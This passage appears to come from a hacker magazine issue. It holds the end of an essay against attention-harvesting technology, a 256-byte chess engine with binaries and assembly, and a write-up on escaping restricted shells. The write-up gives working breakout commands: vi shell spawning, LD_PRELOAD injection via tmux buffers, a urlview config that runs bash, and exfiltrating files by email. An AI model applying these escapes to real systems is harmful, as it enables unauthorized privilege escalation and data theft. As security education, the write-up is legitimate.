certainly not artificially restricted by the designers of the technology. 
In the same way that Kant based the premises of the categorical imperative 
on the ability for humans to reason, Hacker Luddites view this capacity 
for reason as a fundamentally important human ability. When computer 
technology, purchased and entirely in the physical possession of the 
owner, denies arbitrary modification and creation, it greatly reduces the 
ability to reason about the universe with that technology. That technology 
does not allow people to transcend the designers ideas and fully embrace 
some of their most important human traits. Instead it delegates the 
consumers to subordinates with restricted consciousness, and restricted 
capacity for reason, and restricted creativity.


Next up, computer technology applied excessively for the conversion of 
human attention into personal profit.

To the hacker luddites, another nefarious category is the computer systems 
of the world which have been built to turn human attention into profit. 
Rather than proceeds coming from the advancement of humanity, the proceeds 
come primarily from the ability to guide human attention into that 
technological system. The system might be making the profit through ads, 
or it could be a game consumers pay for.

It is understood that resources are required to run technologies and that 
some exchange of information and resources is expected between consumers 
and creators of that technology. Ads can be helpful to a consumer by 
showing them products which they actually want, and games or sites for 
information exchange are highly enjoyable to many people and therefore 
provide benefit. It is when the methods and means become excessive that 
hacker luddites take an issue.

When technologies, whether delivering advertisements or games, exploit 
human psychology and physiology to turn a profit from their consumers, 
they may often be directly limiting, and in a significant way, the 
consciousness, reason, or creativity of that consumer.

The other problem is when instead of advertisements showing people what 
they want, advertisements subconsciously manipulate peoples desires (such 
as sex, popularity, and power) to override their consciousness and 
reasoning abilities to get them to want and purchase products regardless 
of the products abilities to help the consumer attain those desires. 

And what if technologies instead of providing an opportunity for 
relaxation or fun or profound information sharing or whatever also create 
systems of psychological control where neurophysics brings users attention 
back to technology to get addictive releases of dopamine or serotonin or 
who knows what, using the darker arts of gamification. Or perhaps innate 
human survival mechanisms related to group dynamics are being exploited by 
the technology, such as showing automatically generated advertisements, 
messages, and symbols as endorsed by members of a group, or creating 
virtual resource systems where drives for competition or collaboration 
drive behavior. 

It may be that these technologies which capture human attention are simply 
what most consumers want from their technology, after all 30% of internet 
traffic generated by humans is for porn [1]. If distraction and the 
subordination of reason, creativity, or consciousness is the will of the 
majority, Hacker Luddites seriously disagree with the majority and most 
definitely oppose the designers that subordinate them.

What defenses does the modern person have to protect against the likes and 
tweets and clicks and slide to unlocks and checkmarks and tabs and porn 
and endless dopamine and serotonin harvesting mechanisms? These systems 
were sometimes built to reap monetary gain, sometimes built for 
communication control, and sometimes for nothing of any value... in 
exchange for a portion of the time, attention, and thoughts of the user as 
well as their information...


Don't buy and don't use them. 

If you do use them, use the them only in great moderation and only at 
consciously specified times. 

Inform others and expose existing and emerging technologies which may be 
limiting human potential.

Augment the technology in your possession to block advertisements. 

Degrade the quality or value of your attention to the attention-to-profit 
technologies by: 

- Sharing and proxying accounts with multiple users.
- Writing user interfaces to the user interfaces.
- Poisoning user activity with subtle fuzzers alongside your normal 
activity where it makes sense.

Similarly, make your information more useless by lying.

- Don't bother with real names where they don't matter.
- Fill out forms like madlibs.

[1] http://www.extremetech.com/computing/123929-just-how-big-are-porn-sites
-- 30% of the internet traffic out there is porn


|=[ 0x02 ]=---=[ Chesslin - Baudsurfer/Red Sector Inc. ]=----------------=|


                               [ CHESSLIN ]
                     [ by Baudsurfer/Red Sector Inc. ]


|=--[ Introduction

This is a sizecoding exercise to code a playable chess engine in 256 bytes.
This POC is very experimental and bears several shortcomings when comparing
with any other real FIDE existing chess game engine : you have been warned.
It plays like a fish as AI is reduced to a half-ply max solely, it also has
no end-game detection, pawns move only a single square, it cannot castle or
do promotions - let alone en-passant - and takes about a hundred seconds to
play. It also only works on Microsoft Windows XP SP3. Like minimalist Edlin
line editor Cheesslin focuses on a single console line. Whites start at the
bottom of the virtual chess board but SAN notation order is inverse ranks :

   A B C D E F G H
1  r n b q k b n r
2  p p p p p p p p
3
4
5
6
7  P P P P P P P P
8  R N B Q K B N R

So in order to test Chesslin one can uudecode below binaries to input first
algebraic notation "h7h6" characters starting game by moving the White pawn
on H file from seventh rank to sixth rank. A longer example string sequence
of gameplay is "h7h6h2h3g8f6h3h4f6g4h4h5g4h2g1h3h2f1h3g5". Remember if your
keyboard input is not legal chess then Chesslin will silently expect you to
enter again a conforming four ascii character string just to proceed. Thus,
if only a single faulty character was entered you will need to fill-in with
three more "dummy" characters before re-typing a desired algebraic notation
for validation only occurs every four-chars exactly. All bugs are ofc mine.

|=--[ Chesslin binaries

begin 644 CHESSLIN.COM
hMDCeaMbsgG-ai0J1BZ7aow+Y1ue7REu7PJsA06V3Ps1d+y9YjjjzJfY2+8nB
h8S9vUD66LrIfqSvTRTeyxTyhCC-m1CV1+565W2LtqkLP54Pz-LLbgE8hp-+3
hM0afsjTf2MbyWTSl-7XB3efWyiUN+59lu+A+O0E-fGpVARIEWQS2mLI0VWoY
hWABUjjjzgEXcGk-oFX10VAdpE6bvWAPcD+-o-X10VAdpAGbTcjLzWD+Y-uU-
hR+8l-1k-iyI-ptRp2DP405I0Ney2vPY0+5I0GOw-rz8iR+Hf+JXtMQDcaDxp
Uxkyk-QAJ-lAD1kzTsSvm1V6T6T+Ezk2D2T5jwC+D2F+D
+
end

begin 644 CHESSLIN.COM
M8/.JF8GXL2!FN"5#-E)FT\`D#ZJ)=0Z);5X,"(A%;X#I`^+DOOO_5KD$`*S-
M*>+[@/((7W4KV>[?=?J^]?^M..!R#.A#`'('B$7YVP7;'&;_!77GL0*MU!`%
M8"FKXO?K$8G^B?>Q!)C-%JKB^N@9`'+QZ`,`:"0!K2UA,=40B<>$R74"ABTD
MB,-@OOO_L0CH2P!T1C#"A,IU0(G[B,;H/`!T!C#"A,IU,2G?HO7_B/`D!Z@!
M=`*Q!#P!N^4!UY=U$/;&"'4"9J^$[;D"`'4"2:\!W_*N=`3K`5CY8</HF/]U
@]P^P!<,5!Q,/#P_?X>[R#A(?(?`0_P$/$?'O\.`/$1`/
`
end

|=--[ Chesslin source code

;   "You don't need eyes to see You need vision." - Faithless       _
;   Special greets to : Impure ASCII 1940 and Divine Stylers!      | |
;   Greets : Alco Bon^2 BReWErS CODEX Flush Lineout Mandarine   .--' `--.
;   Onslaught Paranoimia Quartex Rebels Razor1911 RiOT Titan.   `--. .--'
;       _     _          _                _          _          ___| |___
; ______)\___ )\_________)\_______________)\_________)\        /         \
;/________ __\\  __________ _________ ____ /____ ____ /        \         /
;   ______)\\__  \____  ___)\_____  _)\  /(_____)\  /(____      \       /
; _/  _   _/  /   _   \_\____ _   \_\  \/    _/\  \/    _/       \     /
; \    \  \___\__  \        / \) __\___ __  /_\___ __  /_____   __>   <__
;  \    \_/     /   \      /   \/     /__\)_    _/__\)_     /  (___   ___)
;   \    /     /____/\    /\   /\    /   /\/    X   /\/    /      |   |
;   /_________/       \__/  \_______/_\____ ___/ \________/  ::::;|   |
;:                                 ___)\ __)\____________         |   |;: :
;.-------------------------------, \    \\_\ \_____ ____/ gRK     |   |
;\Red Sector Incorporated presents\ \    \_(__)_  _)\   ___      (     )
; \Chesslin minimalist chess engine\ \    \    (__)  \_/  /_    _/     \_
;  \A 256 bytes DOS tiny intro XPSP3\ \    \     \     _ / \   _>       <_
;   \For Phrack Magazine #0x45 _ 2016\ \    \/    \    \    \_(___________)
;;;;,\Coded by Baudsurfer\RSi  \\ &FU \ \   /\     \    \_____X___________>
;      `------------------------' `----'  \_/  \_____\___/
w equ word                ; 16-bit prettifying helper,Chesslin v1.0 in 2016
d equ dword               ; 32-bit prettifying helper,fasm assembler syntax
  org 100h                ; binary ip execution seg start address above psp
  pusha                   ; para down stack and avoid input buff collisions
  rep stosb               ; prepare board empty squares assumes ax=0 cx=255
  cwd                     ; set Black=0=top active player turn, White=8=bot
  xchg ax,di              ; shorter mov di,ax prepares writing segment base
  mov cl,20h              ; 32 initialization decoding bit rotations in all
a:mov eax,52364325h       ; back-rank "rnbqkbnr" nibble-encoded 32b pattern
  rol eax,cl              ; rotate next Black chess piece value in lsnibble
  and al,15               ; isolate a Black chess piece value from lsnibble
  stosb                   ; left-to-right write Black back-rank major piece
  mov [di+0eh],si         ; left-to-right write Black pawns assumes si=100h
  mov [di+5eh],bp         ; left-to-right write White pawns assumes bp=9xxh
  or al,8                 ; transforms Black back-rank major piece to White
  mov [di+6fh],al         ; left-to-right write White back-rank major piece
  sub cl,3                ; fixes back-rank pattern nibble rotation counter
  loop a                  ; file-by-file ranks init loops 20h/(3+1)=8 times
b:mov si,0fffbh           ; point source index to algebraic notation buffer
  push si                 ; shorter save of algebraic notation buffer start
  mov cx,4                ; print dword ascii algebraic notation buffer str
c:lodsb                   ; get one of four usr/cpu bytes from ascii buffer
  int 29h                 ; dos api fast console out display char al=[di++]
  loop c                  ; continue until ascii file-first pair chars left
  xor dl,8                ; alternate active player turn Black=0 or White=8
  pop di                  ; shorter restore algebraic notation buffer start
  jnz h                   ; if active player turn is White then do keyboard
  fldz                    ; else Black active player turn fpu load +0.0 cst
  fbstp [di-6]            ; and store back 80-bit packed bcd decimal number
e:mov si,0fff5h           ; zeroed this,best score 0fff5h and coords 0fff7h
  lodsw                   ; move lsb=potential capture vs. msb=best capture
  cmp al,ah               ; compare this capture value against best capture
  jc f                    ; prune calculations if capture already lower val
  call n                  ; else verify the attack potential chess legality
  jc f                    ; capture higher value but move was illegal chess
  mov [di-7],al           ; successful calculation thus store newer highest
  fild d [di]             ; successful calculation thus load current coords
  fistp d [si]            ; successful calculation thus store highest coord
f:inc d [di]              ; resume exploring exhaustive [0;0ffffh] interval
  jnz e                   ; including subset ["1a1a";"8h8h"] until finished
  mov cl,2                ; convert int32 to two file-first algebraic words
g:lodsw                   ; get first int16 msw/lsw algebraic notation word
  aam 16                  ; integer to expanded zero-based file/rank nibble
  add ax,2960h            ; translate file/rank to ascii chess board origin
  stosw                   ; write pair=half of the ascii move buffer string
  loop g                  ; get next int16 msw/lsw words algebraic notation
  jmp k                   ; and proceed examining ascii move buffer strings
h:mov si,di               ; di points to 0fffbh for both input and verifify
i:mov di,si               ; resets every input to algebraic notation buffer
  mov cl,4                ; one file-first algebraic notation is four bytes
j:cbw                     ; zero accumulator msb to set funct get keystroke
  int 16h                 ; al=dos bios keyboard services api blocking read
  stosb                   ; src file=fffb;rank=fffc dst file=fffd;rank=fffe
  loop j                  ; all file-first algebraic ascii quartet inputed?
  call n                  ; else verify algebraic ascii move is legal chess
  jc i                    ; if not then proceed to ask user input move anew
k:call l                  ; converts algebraic notation buffer ascii source
  push w b                ; redirect second fall-through return to printout
l:lodsw                   ; algebraic notation buffer ascii source then dst
  sub ax,3161h            ; convert to zero-based alphanumerical 3161h="a1"
  aad 16                  ; convert to x88 board representation (al+=ah*16)
  mov di,ax               ; add x88 chess board representation memory start
  test cl,cl              ; verify caller's asked mode is passive or active
  jnz m                   ; call asked mode mutex is passive so skip writes
  xchg [di],ch            ; call asked mode mutex is active so write board!
m:and al,88h              ; test if inside main chess board x88 bitmask use
  ret                     ; return to standard callers or printout redirect
n:pusha                   ; save reg vals in: si=fff7h/fffbh di=fffbh/ffffh
  mov si,0fffbh           ; point source index to current ascii move buffer
  mov cl,8                ; set passive mode count mutex for only verifying
  call x                  ; convert buffer ascii src pair to x88 memory add
  jz u                    ; source is non-conforming : illegal empty square
  xor dl,al               ; sets move conformitiy using active player color
  test dl,cl              ; test move conformity using active player colour
  jnz u                   ; source is non-conforming : opponent turn colour
  mov bx,di               ; else if source conforming then save piece addr.
  mov dh,al               ; else if source conforming then save piece value
  call x                  ; convert buffer ascii dest to x88 memory address
  jz o                    ; if move nature not an attack skip over captures
  xor dl,al               ; sets move conformitiy using active player color
  test dl,cl              ; test move conformity using active player colour
  jnz u                   ; destination is non-conforming : same turn color
o:sub di,bx               ; source & destination conforming so obtain delta
  mov [0fff5h],al         ; save piece value as non-transactional potential
  mov al,dh               ; restore previous saved move source piece nature
  and al,7                ; normalize gray piece nature colorless isolation
  test al,1               ; determine source piece's parity interval length
  jz p                    ; piece face=piece nature=piece value=piece score
  mov cl,4                ; override halfing default interval len if parity
p:cmp al,1                ; test if moving piece is a special handling pawn
  mov bx,y                ; piece memory address off-by-one index ret fixed
  xlatb                   ; move piece original start offset memory address
  xchg ax,di              ; offset becomes accumulator becomes displacement
  jnz s                   ; leave if move source piece not special handling
  test dh,8               ; else adjust move source pawn color displacement
  jnz q                   ; no White pawn displacement sub-interval fixings
  scasd                   ; displacement interval offset+=4 for black pawns
q:test ch,ch              ; verify if pawn is attacking an opponent piece ?
  mov cx,2                ; loop index clears msb placeholder also sets lsb
  jnz s                   ; if non-empty square : pawn attacking diagonally
  dec cx                  ; else decrease parity interval size special case
r:scasw                   ; displacement interval start+=2 prunes attacking
s:add di,bx               ; set displacement interval scanning start offset
  repnz scasb             ; verify move exists in displacement sub-interval
  jz v                    ; ZF set legal src piece displacement delta found
  jmp u                   ; illegal src piece displacement: delta not found
t:pop ax                  ; bail shotcircuits nested dataflow function call
u:stc                     ; carry mutex persists indicating move is illegal
v:popa                    ; persistant CF mutex is indicator to legal chess
  ret                     ; restore move mode mutex cl=passive or cl=active
x:call l                  ; verify this move legal within inside main board
  jnz t                   ; exits for illegal move piece outside main board
  cmpxchg [di],al         ; discriminate from special case zero return vals
y:db 195,21,7,19,15,15,15 ; p[1]PF4,n[2]PF8,b[3]PF4,q[4]PF8,r[5]PF4,k[6]PF8
z:db -33,-31,-18,-14,14   ; prev label is ret+1 parity displacement offsets
  db 18,31,33,-16,16,-1,1 ; z array is displacement overlap interval values
  db 15,17,-15,-17,-16    ; knight rook+8 bishop+12 pawns White+12 Black+18
  db -32,15,17,16         ; queen and king moves are rook+bishop+pawn moves


|=[ 0x03 ]=---=[ He Compels Secure Shells - DangerMouse ]=---------------=|


|=-----------------------------------------------------------------------=|
|=----------------------=[ He Compels Secure Shells ]=-------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ by DangerMouse ]=---------------------------=|
|=-----------------------------------------------------------------------=|


--[ Table of Contents

--[ Introduction
--[ Exploration - Primitive Gathering.
----[ Execution Primitive
----[ Write Primitive
----[ Read Primitive
--[ A real life example - freeshell.org
--[ A real life example - Private shell box
--[ Attacking the transport 
--[ Conclusion
--[ References
--[ Appendix A - Common commands with useful primitives
--[ Appendix B - psh Source code 

--[ Introduction

Welcome reader, in this small text we will look at a scenario which is
probably familiar to most of you. That is, breaking out of secure shells.

For those of you who don't know, a common scenario exists where an
administrator of some kind of device wishes to grant restricted access to
the functionality of that device. To accomplish this he/she will create a
shell (graphical or cli) which provides a subset of the features of the
system to the user. This may be as simple as replacing the user in
question's UNIX account shell with a custom written readline() loop which
executes options from a set list of commands.

There are numerous pit-falls associated with this practice which provide us
with a means to escalate our privileges from within the restricted shell.
In this write-up we will examine some of these pitfalls, as well as look at
the general process for investigating a restricted shell and eventually
breaking out to a higher entitled environment. To illustrate these points
we will look at some real life examples of secure shells and how we can
break them.

Some examples of pre-packaged, existing restricted shells are:
rbash/rssh/smrsh/rksh, however there also exists an endless array of custom
shells written for one off cases.

--[ Exploration - Primitive Gathering.

When investigating a secure shell environment, I find it best to
systematically explore each of the options within the shell looking to
collect certain primitives with which to elevate the options available.

----[ Execution Primitive

Typically the most useful primitive which we gain is the execute primitive.
Sometimes the ability to execute arbitrary commands is enough to break out
of the shell, for example executing a more complete shell such as bash from
within a restricted shell can often be enough to completely invalidate the
security of the system. Some examples of how to gain this primitive are:

 - Using the shell execute feature of many common shell commands, for
   example using the "!<shell command>" feature of the less pager.
 - Invoking the execution of a text editor (often defined by the EDITOR
   variable) from within another application. Then using shell execute
   features of the editor to escape. 
 - Combining other primitives to hijack execution of exposed applications.

Here is a commonly used example of using the vi command to gain an
execution primitive:

    ~$ vi
    :set shell=/bin/sh
    :shell
    bash$

From a GUI perspective, many years ago, after drinking at a conference we
decided it would be fun to create a game around breaking out from the many
netcafe's which littered the streets at this time. These netcafes used to
provide a restricted windows GUI with functionality removed, and the goal
was to race to break out, without using any real 0day.

Often in this scenario an easy win was provided by invoking the mirc32.exe
application (when it was whitelisted) and then using the /exec command to
invoke cmd.exe. Another option was to set the handler for telnet:// uri's
in the browser to cmd.exe and spawn it that way.

Another byproduct of using software in an unintended way is that the
security evaluation of the product technically neglects the permiters that
are being exposed to an untrusted user. This means that often there are
trivial memory corruption bugs exposed in the application which go
unreported since even when people find them they do not care a great deal.

eg:

    $ perl -e'print "A"x50,"\n"' | ftp 
    Segmentation fault: 11

It is definitely worthwhile auditing some of the commonly included commands
in secure shells for easily triggerable memory corruption bugs, since these
can often be all that's needed to gain the execution primitive and win.

Another common method of gaining the execution primitive is to abuse
environment variable control to influence the dynamic linker. Typically
this means setting the LD_PRELOAD/DYLD_INSERT_LIBRARIES/Whatever variable
that provides a mechanism for injecting shared objects into a process as
soon as the dynamic linker loads. Obviously for this to work we also need a
write primitive before hand to store the library we wish to load somewhere.
The tmux example later in the paper shows a real life case where this was
possible.

----[ Write Primitive

Obviously in some cases we cannot easily gain the execute primitive. In
these cases we also looking for additional primitives which we can leverage
to eventually gain an execution primitive. 

Finding a write primitive is usually pretty easy. Most applications need
some way to retain state between runs. Some examples are:

 - Input redirection operators ('>', '>>', '>|', '<>', '>&', '&>', etc)
 - Save ability of applications, text editors, etc
 - Log files

In one case I saw, a write primitive alone was enough to break out of the
restricted shell. By writing to a .unrestricted_user file within the home
directory of your user account, the next login was presented with a bash
shell. This is not typically the case though. 

When a write primitive is aquired it is also worth keeping in mind the
trick mentioned in [3]. If any of the invoked shell commands use wildcard
expansion on a directory, it can sometimes be possible to create files
beginning with the '-' character, to pass arguments to those commands.

As you will see in the real life examples below, write primitives are
typically available in most applications, and can easily be leveraged in a
variety of ways to continue breaking out of the shell.

----[ Read Primitive

When talking about a read primitive, we need some way to read an arbitrary
file from the file system and display its contents on the screen.

Sometimes this can be relatively straight forward, for example in a shell
which uses /usr/bin/less as a pager, you can use the :e (examine) command
to open an alternative file. However often with less you can execute a
command with ! as well, but in a case where you are unaware of the file
system, you can use the e command to brute force directory structure to
find things which are worthwhile executing.

Other applications are less straight forward, sometimes the read primitive
may be filtered, or evaluated as a config file for the program. In these
cases, sometimes contents of the file can only be retreived via error
messages. Basically whenever you see a file path being provided to an
application, you can test it wtih some known files to see if there is a way
to retreive the contents.

Even when it is im-possible to retrieve the contents of a file, sometimes a
program will respond differently when a file exists or not. This may be
easily noticed, or something subtle like return codes. This leak can be
used to map out the file system.

--[ A real life example - freeshell.org

Now that we've looked at a more generic approach to defeating secure
shells, we will look at some real world examples. The first of which is the
restrcited shell "psh" which is used in the freeshell.org environment. (SDF
Public Access UNIX System).

Before we get started looking at freeshell.org, i'd just like to say, I
have nothing but respect for freeshell.org. I have been playing with the
restricted shell on there for around 12 years, and have broken it a number
of ways. Several times I have contacted the admins to let them know. To me
this has provided a constantly evolving wargame which has been hours of
fun. 

The process of setting up an account on freeshell.org is really simple.
By ssh'ing into the freeshell.org box as the user "new" you are redirected
to a sign up process.

$ ssh new@freeshell.org

You will now be connected to NEWUSER mkacct server.
Please login as 'new' when prompted.

[RETURN] 

THIS MAY TAKE A MOMENT .. Trying 192.94.73.20...
Connected to 192.94.73.20.
Escape character is 'off'.

NetBSD/amd64 (ol) (pts/2)

login: new

Welcome to the SDF Public Access UNIX System - Est. 1987
You are the 79th guest today, logged in on 02-Sep-15 17:05:23.

Are you using Windows 2K or XP? (Y/N) N

------

This new user process takes us to the first restricted shell. FEP.
Typing `help` shows us the following menu:

FEP Command: help  

+--------------------------------------------------------------+
|COMMAND             | DESCRIPTION                             |
+--------------------------------------------------------------+
|what                | what is the SDF public access UNIX?     |
|w2k                 | important info for Windows 2k/XP users  |
|mkacct              | create your own UNIX shell account      |
|dialup              | US & Canada SDF dialup access           |
|teach               | for teachers and UNIX class instructors |
|traceroute  {host}  | map a route to a specified host         |
|whois       {host}  | list whois directory entry for a domain |
|ruptime             | display system status                   |
|finger      {user}  | check if a login is available           |
|software            | ported and installed software packages  |
|mil                 | information about our US Military Waiver|
|logout              | disconnect from sdf.org                 |
+--------------------------------------------------------------+

As you can see this provides us with some basic applications which we can
run, but also allows us to kick off the mkacct process to make our own
account. 

By running the finger command on our current user (new). We can see that
the new user has a shell of /sys/new/mkacct, which is the restricted shell
we are in.

FEP Command: finger new
Login: new                              Name: SDF newuser
Directory: /sys/new                     Shell: /sys/new/mkacct
On since Wed Sep  2 17:05 (UTC) on pts/2 (messages off)
No Mail.

The next thing we can see, is that they have not sanitized the arguments to
finger. This means that we can pass arguments to the commands listed in the
menu, this is a common mistake that people make when making restricted
shells.

FEP Command: finger -?
finger: unknown option -- ?
usage: finger [-lmpshog8] [login ...]

If we enter finger by itself, we are prompted with the usage, rather than
displaying all users on the system logged in.

FEP Command: finger 
usage: finger {user}

However by passing in --, telling getopts to terminate arguments, we can
accomplish the same thing, and list users logged into the system.

FEP Command: finger --
Login    Name                Tty      Idle  Login Time   Office     Office
Phone
new      SDF newuser        *pts/2       -  Wed 17:05    
smj      Stephen M. Jones    pts/0      33  Tue 21:39    
smj      Stephen M. Jones    pts/4      33  Wed 16:34 

This shell is not the focus of the write-up however, instead, if we run the
mkacct command, we are prompted for a user-name and password, and able to
log into our shiney new psh shell.

---

You are about to create a UNIX shell account.  This account may be unlike
anything you've used before.  We urge you to carefully read all the text
displayed on your terminal, as it will aide you in your learning.
We also encourage you to try all the commands available with your new
account.  There are many types of games, applications and utilities
you will be able to instantly run in just a few moments.  If you are
looking for a particular command or version of a command that we do not
have, there are ways to request that it be installed.  We also offer DIALUP
and DSL in the USA and Canada which you will be able to learn about
shortly.  Be patient, read what is displayed - Explore and Enjoy!

[RETURN]

First, you need to choose a LOGIN.  A LOGIN allows you to LOG IN
to the system.  Your LOGIN can be 1 to 16 characters in length and
can be composed of alpha-numeric characters (middle period is OK).

What would you like to use for your login? 

...

Type 'help' for Commands.
Type 'com' to chat with other users.
Type 'ttytter' to listen to Twitter Tweets anonymously.
Type 'mud' to play the SDFmud.
Type 'mkhomepg' to set up your personal website.


Did you know you can become a permanent LIFETIME member of SDF
by making a onetime donation of $36?  Type 'arpa' for more info!

sdf:/udd/d/dangermouse> 
sdf:/udd/d/dangermouse> help
SDF psh Version 8 - *PREVALIDATED SHELL ACCOUNT*

 what         - what can I use this account for?
 unix         - a listing of UNIX commands available to you NOW
 how          - information on increasing membership
 teach        - using SDF in a classroom setting
 dialup       - information about SDF dialup service
 arpa         - about lifetime arpa membership
 bboard       - sdf user message boards
 commode      - chat with other users online
 ysm          - chat on the ICQ network
 bsflite      - chat on the AIM network
 msnre        - chat on the MSN network
 ttytter      - listen to Twitter tweets anonymously
 lynx         - browse the WWW textually or access GOPHER
 bksp         - set your BACKSPACE key
 faq          - frequently asked questions
 software     - display software programs installed on the system
 quote        - get a real time stock quote
 games        - a listing of available games
 thxmoo       - connect to the THXMOO
 mud          - connect to the SDFmud
 validate     - gain additional shell access (also try 'user' for details)

sdf:/udd/d/dangermouse>

----

As you can see, this shell gives us access to a variety of unix utilities
as well as perform some basic shell commands such as cat/cd/etc. However
this is a little deceiving as many of the commands are filtered. We can
change directory anywhere on the system, which is useful for exploring the
directory structure, however when we try to cat files to view their
contents we can see that only files in our home directory are available.

The first method which I found for breaking out of psh revolved around 
the "lynx" text based web browser. My first thought was to open file://
based urls however they have disabled the ability to browse to arbitrary
locations.

My next thought was to spawn a shell with !, however when you attempt this,
the message "Spawning is disabled!" is shown. From this it was possible to
determine that lynx was being spawned with the "-restrictions=all" command
line argument. However, due to the nature of getopts() (the c library
function for parsing command line arguments) it is often possible to
re-enter the case associated for a particular argument. With this in mind
we could specify a new value for -restrictions, and spawn a shell with the
"!" key from within the new lynx. This has long been fixed in both lynx and
the SDF shell, psh.

The most recent way in which I escaped the psh shell was much more
complicated than the lynx method. The first step was to identify where the
source code for psh is located. Trying to change directory to an invalid
directory leaks this information, as seen below.

faeroes:/usr> cd doesnotexist
/usr/local/bin/psh[611]: cd: /usr/doesnotexist - No such file or directory

Next, I needed to view the source code of the psh, in order to look for
potential ways to escape. Attempting to use "cat" or "pico" to view this
file however, shows that they have placed restrictions around viewing files
outside of the home directory.

    sdf:/usr/local/bin> cat /usr/local/bin/psh
    usage: cat {filename}

Looking back at our list of possible applications to exploit for our
primitives I quickly fell apon the next most complex in the list, the
"mutt" mail client.

By pressing the E key on an email in mutt, it's possible to invoke the
command stored in the EDITOR environment variable, in the case of psh, this
is:

    EDITOR=/usr/pkg/bin/pico

However, since pico is executed from within mutt, the -o (sandbox) option
is not used. This means that from within the spawned pico process we can
read any file, giving us our read primitive. The current source code for
the psh shell is included in the appendix for you to learn from. In order
to read arbitrary files from pico, we simply press the ctrl+r (^R) key
combination and type a file-name. 

From within this pico execution we are also able to save files using the
ctrl+o hotkey (^O). This provides us an arbitrary write primitive, which
will come in useful for us later.

In the freeshell case, from within this environment we actually have the
ability to send email. This provides an easy way for us to exfiltrate
files. This can be done by reading a file (such as psh) into our pico
session, then mailing it to a mailinator address for extraction.

Now that we have read/write primitives, we need to leverage them to gain
an execution primitive. After much investigation, the way that i ended up
doing this was to abuse the urlview feature of mutt.

Mutt offers the ability to select a email message and hit the ctrl+b (^B)
hotkey in order to display a list of url's within the email message. The
line in the config file which enables this is shown below.

^B       M |urlview\n      call urlview to extract URLs out of a
                           message    

As you can see, the email message is simply piped to the urlview
application. The description of this application from the manual page
describes urlview as:

       urlview  is  a  screen  oriented  program for extracting URLs from
       text files and displaying a menu from which you may launch a
       command to view a specific item.

From the man page we can see that urlview is driven from a configuration
file, either a system wide one "/etc/urlview.conf" or a local user copy 
"~/.urlview". This configuration file is worth investigation with our write
primitive to see what is available.

Again from the configuration file, we can see that the COMMAND option fits
our need. It's description is shown below.

COMMAND command
If the specified command contains a %s, it will be subsituted with the
URL that was requested, otherwise the URL is appended to the COMMAND
string. The default COMMAND is:

    url_handler.sh %s 

As you can see, all that's needed it to create a configuration file with
the following contents:

    COMMAND /usr/pkg/bin/bash # %s

This will cause urlview to append the url to the above line, and execute
it. Since a # is used prior to the %s the url will be treated as a
comment. This results in an unrestricted bash shell being executed when we
select an email message, press v followed by ctrl+b.

Once again this technique has been fixed, I will leave it as an exercise
for the reader to find a new one. Hopefully freeshell is not angry about
this since it is a learning exercise.

--[ A real life example - Private shell box

Recently a friend of mine set up a private ircd box for some semi-trusted
people. He created a chrooted environment where a user could ssh into a
box and be greeted with a tmux session containing a single window with the
irssi client inside it. I was unable to create a new window, or execute any
other commands. Irssi was heavily restricted using a configuration file,
stopping easy wins like /exec from within the irssi client.

After some trial and error, i settled into the tmux man page for
inspiration. tmux supports a variety of commands which can be entered by
pressing the tmux hotkey (ctrl+b) in this case and the : key. This provides
a small shell in which you can enter commands to tmux.

Reading the man-page, one of the first commands which stood out was as
follows:

 update-environment variables
    Set a space-separated string containing a list of environment variables
to be copied into the session environment when a new session is created or
an existing session is attached. Any variables that do not exist in the
source environment are set to be removed from the session environment (as
if -r was given to the set-environment command). The default is "DISPLAY
SSH_ASKPASS SSH_AUTH_SOCK SSH_AGENT_PID SSH_CONNECTION WINDOWID
XAUTHORITY".

To test this, i set the environment variable LD_PRELOAD to the value
/tmp/wut.so. Then i logged out and into the box. This resulted in a
segmentation faul upon connecting back as irssi tried to spawn, while
loading a shared library which didn't exist. Great i'd found a bug, but
unfortunately i'd locked myself out of the shell. Since this was a test, i
could luckily ask my friend to restart my tmux session, however in a real
case this would have been trouble. Now i had the ability to load a dynamic
library of my choice, however without the ability to create one on disk, i
was still not any better off. 

After reading the tmux man page a little more, i came across the commands
responsible for managing the paste buffers.

Specifically, it is possible to load a paste buffer from a file using the
command: 

 load-buffer [-b buffer-name] path

        (alias: loadb)

    Load the contents of the specified paste buffer from path.

With the paste buffer containing a file, you can then use:

 show-buffer [-b buffer-name]

        (alias: showb)

    Display the contents of the specified buffer.

This creates a new tmux window, containing the contents of the file you
loaded. This gives us the read primitive.

We can also use the command:

 save-buffer [-a] [-b buffer-name] path

        (alias: saveb)

    Save the contents of the specified paste buffer to path. The -a option
appends to rather than overwriting the file.

As you can see, this command allows us to write our buffer out to a
different file. To experiment with this, i copied a shared library that i
knew existed by loading it into the buffer, then writing it out to /tmp.
Then i set LD_PRELOAD, and validated that irssi did not crash.

The final command needed to break out of this shell is:

 set-buffer [-a] [-b buffer-name] [-n new-buffer-name] data

        (alias: setb)

    Set the contents of the specified buffer to data. The -a option appends
to rather than overwriting the buffer. The -n option renames the buffer to
new-buffer-name.

As you can see, this lets us manipulate the paste buffer in a more fine
grain manner, in order to create a .so that we can abuse to get controlled
code execution.

As you can see, the methodology at play here is very similar to the
previous examples, but the actual technology at play was very different.

--[ Attacking the transport 

In some cases the restricted shell is just too restrictive, and it's just
not possible to gain any of these primitives. In these cases there are
still some things that are worth investigating. Sometimes you can attack
the protocol with which you are connecting to the system. The first
example, is the shellshock vulnerability (sorry to use a buzzword). 
Systems which are vulnerable to shellshock can sometimes be exploited to
execute bash commands prior to invoking the users shell. This obviously
breaks out of the restrictive environment.

Another example, is when the shell is dynamically linked. (Such as
nologin typically). If the user is also given ftp access, or the ability to
otherwise write to their home directory, sometimes the .ssh/ directory can
be written to in order to create a config file, and if sshd is poorly
configured, this can allow the user to provide a LD_PRELOAD environment
variable to the ssh session, bypassing the nologin shell.

--[ Conclusion

As you can hopefully see, setting up a restricted shell in a secure manner
is an almost impossible task. The nature of secure shells involves exposing
an untrusted user to code which was not designed to be trusted. 

While there was not too much as far as technical content in this paper,
hopefully it has still provided you some entertainment, and some ideas you
can use in the future. I definitely encourage you all to play with some
restricted shells as, even if you do not need the functionality, they still
provide a fun free wargame.

Thanks go out to freeshell.org for your interesting wargame levels over the
years, as well as huku for your help with this.

--[ References

1) Restricted shells - Wikipedia -
   https://en.wikipedia.org/wiki/Restricted_shell
2) http://www.freeshell.org
3) http://www.defensecode.com/public/
   DefenseCode_Unix_WildCards_Gone_Wild.txt

--[ Appendix A - Common commands with useful primitives

